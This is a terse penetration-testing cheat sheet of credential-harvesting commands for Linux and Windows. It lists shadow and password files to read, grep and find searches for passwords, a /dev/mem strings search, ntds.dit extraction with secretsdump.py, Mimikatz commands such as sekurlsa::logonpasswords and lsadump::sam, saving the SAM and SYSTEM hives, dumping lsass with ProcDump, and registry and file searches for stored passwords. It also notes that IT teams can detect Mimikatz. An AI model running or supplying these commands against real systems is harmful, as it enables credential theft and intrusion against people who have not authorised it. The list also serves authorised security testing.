Linux
/etc/shadow /etc/gshadow /etc/master.passwd /etc/spwd.db /etc/security/opasswd
find . -type f -exec grep -i -I “PASSWORD” {} /dev/null \;
Grep -rn ‘/’ -ie “PASSWORD” 2>/dev/null
Search in memory →
strings /dev/mem –n10 | grep –i PASS
MimiPenguin → huntergregal/mimpenguin on github
Windows
NTDSUTIL -
Powershell tool to gather the ntds.dit file. Then in Kali we can use:
secretsdump.py -ntds /root/ntds.dit -system /root/SYSTEM LOCAL
Mimikatz
Not really recommended as any IT teams should be able to detect this - It is however very very powerful.
privilege::debug
token::elevate
lsadump::sam
lsadump:lsa
sekurlsa::logonpasswords
vault:cred
Manually :
reg save HKLM\SYSTEM System.dump
reg save HKLM\SAM Sam.dump
ProcDump
.\procdump64.exe -accepteula -ma lsass.exe c:\windows\tmp\lsass.dmp
Register
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Good finds
dir /s *password*
findstr /si password *.txt